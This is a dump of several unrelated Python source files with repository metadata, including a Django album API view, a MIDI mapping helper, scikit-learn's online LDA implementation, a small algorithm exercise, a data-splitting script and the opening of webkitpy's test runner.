| no_license | caioaraujo/discoteka | f22ba641e57b40da2dd08ec1f6c4925699a7d89b | a44ffbe23ce1b36bcc8ad1287db3de13e995705a | refs/heads/master | 2021-01-20T00:36:47.631669 | 2017-05-06T14:34:20 | 2017-05-06T14:34:20 | 89,159,473 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,132 | py | from rest_framework.response import Response
from rest_framework.views import APIView
from album.models import Album as AlbumModel
from album.serializers import AlbumSerializer
from artista.models import Artista as ArtistaModel
from discoteka.exceptions import RegistroNaoEncontradoException, ValorObrigatorioException
class Album(APIView):
def post(self, request):
data = request.data
self.valida_preenchimento(data)
artista_id = data.get('artista')
self.valida_artista(artista_id)
album = AlbumModel()
album.nome = data.get('nome')
album.artista_id = data.get('artista')
album.ano_lancamento = data.get('ano_lancamento')
album.faixas = data.get('faixas')
album.save()
serializer = AlbumSerializer(album)
return Response(serializer.data)
def get(self, request):
albuns = AlbumModel.objects.filter(artista_id=request.GET.get('artista')).all()
serializer = AlbumSerializer(albuns, many=True)
return Response(serializer.data)
def valida_artista(self, artista_id):
artista = ArtistaModel.get_artista_por_id(pk=artista_id)
if not artista:
raise RegistroNaoEncontradoException("Artista %s não encontrado" % artista_id)
def valida_preenchimento(self, dados):
if not dados.get('artista'):
raise ValorObrigatorioException('Artista é obrigatório')
if not dados.get('nome'):
raise ValorObrigatorioException('Nome do álbum é obrigatório')
if not dados.get('ano_lancamento'):
raise ValorObrigatorioException('Ano de lançamento é obrigatório')
if not dados.get('faixas'):
raise ValorObrigatorioException('Nr. de faixas é obrigatório')
class AlbumId(APIView):
def delete(self, request, pk):
album = AlbumModel.get_album_por_id(pk=pk)
if not album:
raise RegistroNaoEncontradoException("Álbum não encontrado")
album.delete()
return Response({'message': 'Álbum removido com sucesso'}, content_type='application/json')
| [
"[email protected]"
]
| |
384d1fd0f22eeef5459a04938bae73d253c4151e | 5a017fc861db92e3a2919f260d54f1301afbb3e5 | /MIDI Remote Scripts/_Framework/MidiMap.py | 815ac4dd8f4cd29c3396fee38203738716dd33b9 | []
| no_license | kera67/livepy_diff_ten | 8d8d0f3b76048f1fe5d4c0fbc02549dc922c7d5b | 12a0af9e9c57d0721af5036ce23af549df2c95f0 | refs/heads/master | 2023-07-14T18:26:33.591915 | 2020-11-19T07:50:28 | 2020-11-19T07:50:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | from __future__ import absolute_import, print_function, unicode_literals
import Live
from .ButtonMatrixElement import ButtonMatrixElement
from .ButtonElement import ButtonElement
from .EncoderElement import EncoderElement
from .SliderElement import SliderElement
def make_button(name, channel, number, midi_message_type):
    is_momentary = True
    return ButtonElement(not is_momentary, midi_message_type, channel, number, name=name)

def make_slider(name, channel, number, midi_message_type):
    return SliderElement(midi_message_type, channel, number, name=name)

def make_encoder(name, channel, number, midi_message_type):
    return EncoderElement(midi_message_type, channel, number, Live.MidiMap.MapMode.absolute, name=name)

class MidiMap(dict):

    def add_button(self, name, channel, number, midi_message_type):
        assert name not in self.keys()
        self[name] = make_button(name, channel, number, midi_message_type)

    def add_matrix(self, name, element_factory, channel, numbers, midi_message_type):
        assert name not in self.keys()

        def one_dimensional_name(base_name, x, _y):
            return u'%s[%d]' % (base_name, x)

        def two_dimensional_name(base_name, x, y):
            return u'%s[%d,%d]' % (base_name, x, y)

        name_factory = two_dimensional_name if len(numbers) > 1 else one_dimensional_name
        elements = [ [ element_factory(name_factory(name, column, row), channel, identifier, midi_message_type) for column, identifier in enumerate(identifiers) ] for row, identifiers in enumerate(numbers) ]
        self[name] = ButtonMatrixElement(rows=elements)
| [
"[email protected]"
]
| |
21bd3a7d87ed73967ff064c91006700c3084477b | 2f55769e4d6bc71bb8ca29399d3809b6d368cf28 | /Miniconda2/Lib/site-packages/sklearn/decomposition/online_lda.py | b7a37d6f416b3f55958826c5a27b633245a724b6 | []
| no_license | jian9695/GSV2SVF | e5ec08b2d37dbc64a461449f73eb7388de8ef233 | 6ed92dac13ea13dfca80f2c0336ea7006a6fce87 | refs/heads/master | 2023-03-02T03:35:17.033360 | 2023-02-27T02:01:48 | 2023-02-27T02:01:48 | 199,570,103 | 9 | 16 | null | 2022-10-28T14:31:05 | 2019-07-30T03:47:41 | Python | UTF-8 | Python | false | false | 27,882 | py | """
=============================================================
Online Latent Dirichlet Allocation with variational inference
=============================================================
This implementation is modified from Matthew D. Hoffman's onlineldavb code
Link: http://matthewdhoffman.com/code/onlineldavb.tar
"""
# Author: Chyi-Kwei Yau
# Author: Matthew D. Hoffman (original onlineldavb implementation)
import numpy as np
import scipy.sparse as sp
from scipy.special import gammaln
import warnings
from ..base import BaseEstimator, TransformerMixin
from ..utils import (check_random_state, check_array,
gen_batches, gen_even_slices, _get_n_jobs)
from ..utils.validation import check_non_negative
from ..utils.extmath import logsumexp
from ..externals.joblib import Parallel, delayed
from ..externals.six.moves import xrange
from ..exceptions import NotFittedError
from ._online_lda import (mean_change, _dirichlet_expectation_1d,
_dirichlet_expectation_2d)
EPS = np.finfo(np.float).eps
def _update_doc_distribution(X, exp_topic_word_distr, doc_topic_prior,
max_iters,
mean_change_tol, cal_sstats, random_state):
"""E-step: update document-topic distribution.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
exp_topic_word_distr : dense matrix, shape=(n_topics, n_features)
Exponential value of expection of log topic word distribution.
In the literature, this is `exp(E[log(beta)])`.
doc_topic_prior : float
Prior of document topic distribution `theta`.
max_iters : int
Max number of iterations for updating document topic distribution in
the E-step.
mean_change_tol : float
Stopping tolerance for updating document topic distribution in E-setp.
cal_sstats : boolean
Parameter that indicate to calculate sufficient statistics or not.
Set `cal_sstats` to `True` when we need to run M-step.
random_state : RandomState instance or None
Parameter that indicate how to initialize document topic distribution.
Set `random_state` to None will initialize document topic distribution
to a constant number.
Returns
-------
(doc_topic_distr, suff_stats) :
`doc_topic_distr` is unnormalized topic distribution for each document.
In the literature, this is `gamma`. we can calculate `E[log(theta)]`
from it.
`suff_stats` is expected sufficient statistics for the M-step.
When `cal_sstats == False`, this will be None.
"""
is_sparse_x = sp.issparse(X)
n_samples, n_features = X.shape
n_topics = exp_topic_word_distr.shape[0]
if random_state:
doc_topic_distr = random_state.gamma(100., 0.01, (n_samples, n_topics))
else:
doc_topic_distr = np.ones((n_samples, n_topics))
# In the literature, this is `exp(E[log(theta)])`
exp_doc_topic = np.exp(_dirichlet_expectation_2d(doc_topic_distr))
# diff on `component_` (only calculate it when `cal_diff` is True)
suff_stats = np.zeros(exp_topic_word_distr.shape) if cal_sstats else None
if is_sparse_x:
X_data = X.data
X_indices = X.indices
X_indptr = X.indptr
for idx_d in xrange(n_samples):
if is_sparse_x:
ids = X_indices[X_indptr[idx_d]:X_indptr[idx_d + 1]]
cnts = X_data[X_indptr[idx_d]:X_indptr[idx_d + 1]]
else:
ids = np.nonzero(X[idx_d, :])[0]
cnts = X[idx_d, ids]
doc_topic_d = doc_topic_distr[idx_d, :]
# The next one is a copy, since the inner loop overwrites it.
exp_doc_topic_d = exp_doc_topic[idx_d, :].copy()
exp_topic_word_d = exp_topic_word_distr[:, ids]
# Iterate between `doc_topic_d` and `norm_phi` until convergence
for _ in xrange(0, max_iters):
last_d = doc_topic_d
# The optimal phi_{dwk} is proportional to
# exp(E[log(theta_{dk})]) * exp(E[log(beta_{dw})]).
norm_phi = np.dot(exp_doc_topic_d, exp_topic_word_d) + EPS
doc_topic_d = (exp_doc_topic_d *
np.dot(cnts / norm_phi, exp_topic_word_d.T))
# Note: adds doc_topic_prior to doc_topic_d, in-place.
_dirichlet_expectation_1d(doc_topic_d, doc_topic_prior,
exp_doc_topic_d)
if mean_change(last_d, doc_topic_d) < mean_change_tol:
break
doc_topic_distr[idx_d, :] = doc_topic_d
# Contribution of document d to the expected sufficient
# statistics for the M step.
if cal_sstats:
norm_phi = np.dot(exp_doc_topic_d, exp_topic_word_d) + EPS
suff_stats[:, ids] += np.outer(exp_doc_topic_d, cnts / norm_phi)
return (doc_topic_distr, suff_stats)
class LatentDirichletAllocation(BaseEstimator, TransformerMixin):
"""Latent Dirichlet Allocation with online variational Bayes algorithm
.. versionadded:: 0.17
Read more in the :ref:`User Guide <LatentDirichletAllocation>`.
Parameters
----------
n_topics : int, optional (default=10)
Number of topics.
doc_topic_prior : float, optional (default=None)
Prior of document topic distribution `theta`. If the value is None,
defaults to `1 / n_topics`.
In the literature, this is called `alpha`.
topic_word_prior : float, optional (default=None)
Prior of topic word distribution `beta`. If the value is None, defaults
to `1 / n_topics`.
In the literature, this is called `eta`.
learning_method : 'batch' | 'online', default='online'
Method used to update `_component`. Only used in `fit` method.
In general, if the data size is large, the online update will be much
faster than the batch update.
The default learning method is going to be changed to 'batch' in the 0.20 release.
Valid options::
'batch': Batch variational Bayes method. Use all training data in
each EM update.
Old `components_` will be overwritten in each iteration.
'online': Online variational Bayes method. In each EM update, use
mini-batch of training data to update the ``components_``
variable incrementally. The learning rate is controlled by the
``learning_decay`` and the ``learning_offset`` parameters.
learning_decay : float, optional (default=0.7)
It is a parameter that control learning rate in the online learning
method. The value should be set between (0.5, 1.0] to guarantee
asymptotic convergence. When the value is 0.0 and batch_size is
``n_samples``, the update method is same as batch learning. In the
literature, this is called kappa.
learning_offset : float, optional (default=10.)
A (positive) parameter that downweights early iterations in online
learning. It should be greater than 1.0. In the literature, this is
called tau_0.
max_iter : integer, optional (default=10)
The maximum number of iterations.
total_samples : int, optional (default=1e6)
Total number of documents. Only used in the `partial_fit` method.
batch_size : int, optional (default=128)
Number of documents to use in each EM iteration. Only used in online
learning.
evaluate_every : int optional (default=0)
How often to evaluate perplexity. Only used in `fit` method.
set it to 0 or negative number to not evalute perplexity in
training at all. Evaluating perplexity can help you check convergence
in training process, but it will also increase total training time.
Evaluating perplexity in every iteration might increase training time
up to two-fold.
perp_tol : float, optional (default=1e-1)
Perplexity tolerance in batch learning. Only used when
``evaluate_every`` is greater than 0.
mean_change_tol : float, optional (default=1e-3)
Stopping tolerance for updating document topic distribution in E-step.
max_doc_update_iter : int (default=100)
Max number of iterations for updating document topic distribution in
the E-step.
n_jobs : int, optional (default=1)
The number of jobs to use in the E-step. If -1, all CPUs are used. For
``n_jobs`` below -1, (n_cpus + 1 + n_jobs) are used.
verbose : int, optional (default=0)
Verbosity level.
random_state : int or RandomState instance or None, optional (default=None)
Pseudo-random number generator seed control.
Attributes
----------
components_ : array, [n_topics, n_features]
Topic word distribution. ``components_[i, j]`` represents word j in
topic `i`.
n_batch_iter_ : int
Number of iterations of the EM step.
n_iter_ : int
Number of passes over the dataset.
References
----------
[1] "Online Learning for Latent Dirichlet Allocation", Matthew D. Hoffman,
David M. Blei, Francis Bach, 2010
[2] "Stochastic Variational Inference", Matthew D. Hoffman, David M. Blei,
Chong Wang, John Paisley, 2013
[3] Matthew D. Hoffman's onlineldavb code. Link:
http://matthewdhoffman.com//code/onlineldavb.tar
"""
def __init__(self, n_topics=10, doc_topic_prior=None,
topic_word_prior=None, learning_method=None,
learning_decay=.7, learning_offset=10., max_iter=10,
batch_size=128, evaluate_every=-1, total_samples=1e6,
perp_tol=1e-1, mean_change_tol=1e-3, max_doc_update_iter=100,
n_jobs=1, verbose=0, random_state=None):
self.n_topics = n_topics
self.doc_topic_prior = doc_topic_prior
self.topic_word_prior = topic_word_prior
self.learning_method = learning_method
self.learning_decay = learning_decay
self.learning_offset = learning_offset
self.max_iter = max_iter
self.batch_size = batch_size
self.evaluate_every = evaluate_every
self.total_samples = total_samples
self.perp_tol = perp_tol
self.mean_change_tol = mean_change_tol
self.max_doc_update_iter = max_doc_update_iter
self.n_jobs = n_jobs
self.verbose = verbose
self.random_state = random_state
def _check_params(self):
"""Check model parameters."""
if self.n_topics <= 0:
raise ValueError("Invalid 'n_topics' parameter: %r"
% self.n_topics)
if self.total_samples <= 0:
raise ValueError("Invalid 'total_samples' parameter: %r"
% self.total_samples)
if self.learning_offset < 0:
raise ValueError("Invalid 'learning_offset' parameter: %r"
% self.learning_offset)
if self.learning_method not in ("batch", "online", None):
raise ValueError("Invalid 'learning_method' parameter: %r"
% self.learning_method)
def _init_latent_vars(self, n_features):
"""Initialize latent variables."""
self.random_state_ = check_random_state(self.random_state)
self.n_batch_iter_ = 1
self.n_iter_ = 0
if self.doc_topic_prior is None:
self.doc_topic_prior_ = 1. / self.n_topics
else:
self.doc_topic_prior_ = self.doc_topic_prior
if self.topic_word_prior is None:
self.topic_word_prior_ = 1. / self.n_topics
else:
self.topic_word_prior_ = self.topic_word_prior
init_gamma = 100.
init_var = 1. / init_gamma
# In the literature, this is called `lambda`
self.components_ = self.random_state_.gamma(
init_gamma, init_var, (self.n_topics, n_features))
# In the literature, this is `exp(E[log(beta)])`
self.exp_dirichlet_component_ = np.exp(
_dirichlet_expectation_2d(self.components_))
def _e_step(self, X, cal_sstats, random_init, parallel=None):
"""E-step in EM update.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
cal_sstats : boolean
Parameter that indicate whether to calculate sufficient statistics
or not. Set ``cal_sstats`` to True when we need to run M-step.
random_init : boolean
Parameter that indicate whether to initialize document topic
distribution randomly in the E-step. Set it to True in training
steps.
parallel : joblib.Parallel (optional)
Pre-initialized instance of joblib.Parallel.
Returns
-------
(doc_topic_distr, suff_stats) :
`doc_topic_distr` is unnormalized topic distribution for each
document. In the literature, this is called `gamma`.
`suff_stats` is expected sufficient statistics for the M-step.
When `cal_sstats == False`, it will be None.
"""
# Run e-step in parallel
random_state = self.random_state_ if random_init else None
# TODO: make Parallel._effective_n_jobs public instead?
n_jobs = _get_n_jobs(self.n_jobs)
if parallel is None:
parallel = Parallel(n_jobs=n_jobs, verbose=max(0, self.verbose - 1))
results = parallel(
delayed(_update_doc_distribution)(X[idx_slice, :],
self.exp_dirichlet_component_,
self.doc_topic_prior_,
self.max_doc_update_iter,
self.mean_change_tol, cal_sstats,
random_state)
for idx_slice in gen_even_slices(X.shape[0], n_jobs))
# merge result
doc_topics, sstats_list = zip(*results)
doc_topic_distr = np.vstack(doc_topics)
if cal_sstats:
# This step finishes computing the sufficient statistics for the
# M-step.
suff_stats = np.zeros(self.components_.shape)
for sstats in sstats_list:
suff_stats += sstats
suff_stats *= self.exp_dirichlet_component_
else:
suff_stats = None
return (doc_topic_distr, suff_stats)
def _em_step(self, X, total_samples, batch_update, parallel=None):
"""EM update for 1 iteration.
update `_component` by batch VB or online VB.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
total_samples : integer
Total umber of documents. It is only used when
batch_update is `False`.
batch_update : boolean
Parameter that controls updating method.
`True` for batch learning, `False` for online learning.
parallel : joblib.Parallel
Pre-initialized instance of joblib.Parallel
Returns
-------
doc_topic_distr : array, shape=(n_samples, n_topics)
Unnormalized document topic distribution.
"""
# E-step
_, suff_stats = self._e_step(X, cal_sstats=True, random_init=True,
parallel=parallel)
# M-step
if batch_update:
self.components_ = self.topic_word_prior_ + suff_stats
else:
# online update
# In the literature, the weight is `rho`
weight = np.power(self.learning_offset + self.n_batch_iter_,
-self.learning_decay)
doc_ratio = float(total_samples) / X.shape[0]
self.components_ *= (1 - weight)
self.components_ += (weight * (self.topic_word_prior_
+ doc_ratio * suff_stats))
# update `component_` related variables
self.exp_dirichlet_component_ = np.exp(
_dirichlet_expectation_2d(self.components_))
self.n_batch_iter_ += 1
return
def _check_non_neg_array(self, X, whom):
"""check X format
check X format and make sure no negative value in X.
Parameters
----------
X : array-like or sparse matrix
"""
X = check_array(X, accept_sparse='csr')
check_non_negative(X, whom)
return X
def partial_fit(self, X, y=None):
"""Online VB with Mini-Batch update.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
self
"""
self._check_params()
X = self._check_non_neg_array(X,
"LatentDirichletAllocation.partial_fit")
n_samples, n_features = X.shape
batch_size = self.batch_size
# initialize parameters or check
if not hasattr(self, 'components_'):
self._init_latent_vars(n_features)
if n_features != self.components_.shape[1]:
raise ValueError(
"The provided data has %d dimensions while "
"the model was trained with feature size %d." %
(n_features, self.components_.shape[1]))
n_jobs = _get_n_jobs(self.n_jobs)
with Parallel(n_jobs=n_jobs, verbose=max(0, self.verbose - 1)) as parallel:
for idx_slice in gen_batches(n_samples, batch_size):
self._em_step(X[idx_slice, :],
total_samples=self.total_samples,
batch_update=False,
parallel=parallel)
return self
def fit(self, X, y=None):
"""Learn model for the data X with variational Bayes method.
When `learning_method` is 'online', use mini-batch update.
Otherwise, use batch update.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
self
"""
self._check_params()
X = self._check_non_neg_array(X, "LatentDirichletAllocation.fit")
n_samples, n_features = X.shape
max_iter = self.max_iter
evaluate_every = self.evaluate_every
learning_method = self.learning_method
if learning_method == None:
warnings.warn("The default value for 'learning_method' will be "
"changed from 'online' to 'batch' in the release 0.20. "
"This warning was introduced in 0.18.",
DeprecationWarning)
learning_method = 'online'
batch_size = self.batch_size
# initialize parameters
self._init_latent_vars(n_features)
# change to perplexity later
last_bound = None
n_jobs = _get_n_jobs(self.n_jobs)
with Parallel(n_jobs=n_jobs, verbose=max(0, self.verbose - 1)) as parallel:
for i in xrange(max_iter):
if learning_method == 'online':
for idx_slice in gen_batches(n_samples, batch_size):
self._em_step(X[idx_slice, :], total_samples=n_samples,
batch_update=False, parallel=parallel)
else:
# batch update
self._em_step(X, total_samples=n_samples,
batch_update=True, parallel=parallel)
# check perplexity
if evaluate_every > 0 and (i + 1) % evaluate_every == 0:
doc_topics_distr, _ = self._e_step(X, cal_sstats=False,
random_init=False,
parallel=parallel)
bound = self.perplexity(X, doc_topics_distr,
sub_sampling=False)
if self.verbose:
print('iteration: %d, perplexity: %.4f'
% (i + 1, bound))
if last_bound and abs(last_bound - bound) < self.perp_tol:
break
last_bound = bound
self.n_iter_ += 1
return self
def transform(self, X):
"""Transform data X according to the fitted model.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
doc_topic_distr : shape=(n_samples, n_topics)
Document topic distribution for X.
"""
if not hasattr(self, 'components_'):
raise NotFittedError("no 'components_' attribute in model."
" Please fit model first.")
# make sure feature size is the same in fitted model and in X
X = self._check_non_neg_array(X, "LatentDirichletAllocation.transform")
n_samples, n_features = X.shape
if n_features != self.components_.shape[1]:
raise ValueError(
"The provided data has %d dimensions while "
"the model was trained with feature size %d." %
(n_features, self.components_.shape[1]))
doc_topic_distr, _ = self._e_step(X, cal_sstats=False,
random_init=False)
# normalize doc_topic_distr
doc_topic_distr /= doc_topic_distr.sum(axis=1)[:, np.newaxis]
return doc_topic_distr
def _approx_bound(self, X, doc_topic_distr, sub_sampling):
"""Estimate the variational bound.
Estimate the variational bound over "all documents" using only the
documents passed in as X. Since log-likelihood of each word cannot
be computed directly, we use this bound to estimate it.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
doc_topic_distr : array, shape=(n_samples, n_topics)
Document topic distribution. In the literature, this is called
gamma.
sub_sampling : boolean, optional, (default=False)
Compensate for subsampling of documents.
It is used in calculate bound in online learning.
Returns
-------
score : float
"""
def _loglikelihood(prior, distr, dirichlet_distr, size):
# calculate log-likelihood
score = np.sum((prior - distr) * dirichlet_distr)
score += np.sum(gammaln(distr) - gammaln(prior))
score += np.sum(gammaln(prior * size) - gammaln(np.sum(distr, 1)))
return score
is_sparse_x = sp.issparse(X)
n_samples, n_topics = doc_topic_distr.shape
n_features = self.components_.shape[1]
score = 0
dirichlet_doc_topic = _dirichlet_expectation_2d(doc_topic_distr)
dirichlet_component_ = _dirichlet_expectation_2d(self.components_)
doc_topic_prior = self.doc_topic_prior_
topic_word_prior = self.topic_word_prior_
if is_sparse_x:
X_data = X.data
X_indices = X.indices
X_indptr = X.indptr
# E[log p(docs | theta, beta)]
for idx_d in xrange(0, n_samples):
if is_sparse_x:
ids = X_indices[X_indptr[idx_d]:X_indptr[idx_d + 1]]
cnts = X_data[X_indptr[idx_d]:X_indptr[idx_d + 1]]
else:
ids = np.nonzero(X[idx_d, :])[0]
cnts = X[idx_d, ids]
temp = (dirichlet_doc_topic[idx_d, :, np.newaxis]
+ dirichlet_component_[:, ids])
norm_phi = logsumexp(temp)
score += np.dot(cnts, norm_phi)
# compute E[log p(theta | alpha) - log q(theta | gamma)]
score += _loglikelihood(doc_topic_prior, doc_topic_distr,
dirichlet_doc_topic, self.n_topics)
# Compensate for the subsampling of the population of documents
if sub_sampling:
doc_ratio = float(self.total_samples) / n_samples
score *= doc_ratio
# E[log p(beta | eta) - log q (beta | lambda)]
score += _loglikelihood(topic_word_prior, self.components_,
dirichlet_component_, n_features)
return score
def score(self, X, y=None):
"""Calculate approximate log-likelihood as score.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
score : float
Use approximate bound as score.
"""
X = self._check_non_neg_array(X, "LatentDirichletAllocation.score")
doc_topic_distr = self.transform(X)
score = self._approx_bound(X, doc_topic_distr, sub_sampling=False)
return score
def perplexity(self, X, doc_topic_distr=None, sub_sampling=False):
"""Calculate approximate perplexity for data X.
Perplexity is defined as exp(-1. * log-likelihood per word)
Parameters
----------
X : array-like or sparse matrix, [n_samples, n_features]
Document word matrix.
doc_topic_distr : None or array, shape=(n_samples, n_topics)
Document topic distribution.
If it is None, it will be generated by applying transform on X.
Returns
-------
score : float
Perplexity score.
"""
if not hasattr(self, 'components_'):
raise NotFittedError("no 'components_' attribute in model."
" Please fit model first.")
X = self._check_non_neg_array(X,
"LatentDirichletAllocation.perplexity")
if doc_topic_distr is None:
doc_topic_distr = self.transform(X)
else:
n_samples, n_topics = doc_topic_distr.shape
if n_samples != X.shape[0]:
raise ValueError("Number of samples in X and doc_topic_distr"
" do not match.")
if n_topics != self.n_topics:
raise ValueError("Number of topics does not match.")
current_samples = X.shape[0]
bound = self._approx_bound(X, doc_topic_distr, sub_sampling)
if sub_sampling:
word_cnt = X.sum() * (float(self.total_samples) / current_samples)
else:
word_cnt = X.sum()
perword_bound = bound / word_cnt
return np.exp(-1.0 * perword_bound)
| [
"[email protected]"
]
| |
1b06f8f93e9915353990e1e374d47340e80aacab | c3e70e85773da05cdf7375d34ebcb3a5560aaa9f | /Greedy/CodingTest_ver3/볼링공_고르기.py | 72a0ff9cc7e747edef4da3aec8ddef01c5732e23 | []
| no_license | hongyeon-kyeong/Algorithm | 5409f0472bd409b957f390b6adae0c67976dda85 | def11fd33f286013837317968991e6b87cc643c3 | refs/heads/main | 2023-04-01T13:43:35.982871 | 2021-03-23T12:20:20 | 2021-03-23T12:20:20 | 318,711,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | n, m = map(int, input().split())
data = list(map(int, input().split()))
weights = [0] * (n+1)
for i in range(n) :
    weights[data[i]] += 1
count = 0
for i in range(1, m+1) :
    n -= weights[i]
    count += (weights[i] * n)
print(count)
# cut down the number of iterations | [
"[email protected]"
]
| |
2dcca14dad5d66de58e425dcc274f0f0a2df7e22 | f4f0b7feb71ba719b373735bc39efb2ebcdddcd8 | /solution/ourFeature/pre.py | a09d54d5798f50e05dcbb9afe0a3cb80329aa5e7 | []
| no_license | fuhailin/2018-Big-Data-Challenge | 112ef765e9866f1b6e521711100aff871d66cb27 | 419db72e110079f208197e9bd8dee0991a72f5a1 | refs/heads/master | 2020-03-20T03:59:15.308366 | 2018-06-26T15:01:50 | 2018-06-26T15:01:50 | 137,166,621 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | """
author: yang yiqing
comment: data preprocessing - split the logs into time windows and build labels
date: 2018-06-16 16:32:00
"""
import pandas as pd
import numpy as np
def split_data(action, launch, register, video):
print('split data...')
for i in range(Num_dataSet):
start_date = start_date_list[i]
end_date = end_date_list[i]
temp_action = action[(action.day >= start_date) & (action.day <= end_date)]
temp_launch = launch[(launch.day >= start_date) & (launch.day <= end_date)]
temp_register = register[(register.day >= start_date) & (register.day <= end_date)]
temp_video = video[(video.day >= start_date) & (video.day <= end_date)]
temp_all_user = np.unique(
temp_action['user_id'].tolist() + temp_register['user_id'].tolist() + temp_launch['user_id'].tolist() +
temp_video['user_id'].tolist())
temp_label_user = np.unique(
action[(action.day > end_date) & (action.day <= end_date + 7)]['user_id'].tolist() +
launch[(launch.day > end_date) & (launch.day <= end_date + 7)]['user_id'].tolist() +
register[(register.day > end_date) & (register.day <= end_date + 7)]['user_id'].tolist() +
video[(video.day > end_date) & (video.day <= end_date + 7)]['user_id'].tolist())
# get label
temp_DF = get_label(temp_all_user, temp_label_user)
# save file
        # the df holds user_id and label; the other log tables can be left-merged onto it via user_id
temp_DF.to_csv('splited_date/df_%d_%d.csv' % (start_date, end_date))
temp_action.to_csv('splited_date/action_%d_%d.csv' % (start_date, end_date))
temp_launch.to_csv('splited_date/launch_%d_%d.csv' % (start_date, end_date))
temp_register.to_csv('splited_date/register_%d_%d.csv' % (start_date, end_date))
temp_video.to_csv('splited_date/video_%d_%d.csv' % (start_date, end_date))
def get_label(all_user, label_user):
print('get label...')
print(len(all_user))
    # for the test-set window every label stays 0
print(len(label_user))
df = pd.DataFrame()
df['user_id'] = all_user
label = np.zeros(len(all_user))
for i in range(len(all_user)):
label[i] = 1 if all_user[i] in label_user else 0
df['label'] = label
df['label'] = df['label'].astype(int)
return df
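# Illustrative sketch (not part of the original pipeline): get_label() simply
# marks which users from the feature window show up again in the label window.
# The ids below are made up, and this helper is never called by the script.
def _example_get_label():
    demo = get_label(np.array([1, 2, 3]), {2, 3})
    # demo now holds user_id [1, 2, 3] with label [0, 1, 1]
    return demo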
if __name__ == '__main__':
    # to change the time windows, only the parameters below need to be edited
Num_dataSet = 3
start_date_list = [1, 8, 15]
end_date_list = [16, 23, 30]
# read data
action = pd.read_csv('data/action.csv', index_col=0)
launch = pd.read_csv('data/launcher.csv', index_col=0)
register = pd.read_csv('data/register.csv', index_col=0)
video = pd.read_csv('data/video.csv', index_col=0)
split_data(action, launch, register, video)
| [
"[email protected]"
]
| |
e50058dbb805fd455badad57c4025ef3de68f4d1 | cd594b9a01ca5a587c0d30c9b41fa099af93f98e | /books/orders/urls.py | 30c514984788da44c258b8c65bb0ef4be70779ed | []
| no_license | raj713335/Django_Professional | 54bf628aa75d81ef2266d6a0c6b53d1705744f3d | 96daff2dc38cda21aa9683ca0b023cd55705323f | refs/heads/master | 2023-02-07T17:04:11.668927 | 2020-12-30T11:11:23 | 2020-12-30T11:11:23 | 324,566,618 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | # orders/urls.py
from django.urls import path
from .views import OrdersPageView, charge
urlpatterns = [
path('charge/', charge, name='charge'),
path('', OrdersPageView.as_view(), name='orders'),
] | [
"[email protected]"
]
| |
7a93e339349e3da4a0f28f244e96094fde8714f8 | dd80a584130ef1a0333429ba76c1cee0eb40df73 | /external/chromium_org/third_party/WebKit/Tools/Scripts/webkitpy/test/main.py | c9a68abbaf0f54b3f78c3123aacd990da38fff79 | [
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"Apache-2.0",
"MIT",
"BSD-3-Clause"
]
| permissive | karunmatharu/Android-4.4-Pay-by-Data | 466f4e169ede13c5835424c78e8c30ce58f885c1 | fcb778e92d4aad525ef7a995660580f948d40bc9 | refs/heads/master | 2021-03-24T13:33:01.721868 | 2017-02-18T17:48:49 | 2017-02-18T17:48:49 | 81,847,777 | 0 | 2 | MIT | 2020-03-09T00:02:12 | 2017-02-13T16:47:00 | null | UTF-8 | Python | false | false | 10,169 | py | # Copyright (C) 2012 Google, Inc.
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""unit testing code for webkitpy."""
import logging
import multiprocessing
import optparse
import os
import StringIO
import sys
import time
import traceback
import unittest
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.common.system.filesystem import FileSystem
from webkitpy.test.finder import Finder
from webkitpy.test.printer import Printer
from webkitpy.test.runner import Runner, unit_test_name
_log = logging.getLogger(__name__)
up = os.path.dirname
webkit_root = up(up(up(up(up(os.path.abspath(__file__))))))
def main():
    filesystem = FileSystem()
    wkf = WebKitFinder(filesystem)
    tester = Tester(filesystem, wkf)
    tester.add_tree(wkf.path_from_webkit_base('Tools', 'Scripts'), 'webkitpy')
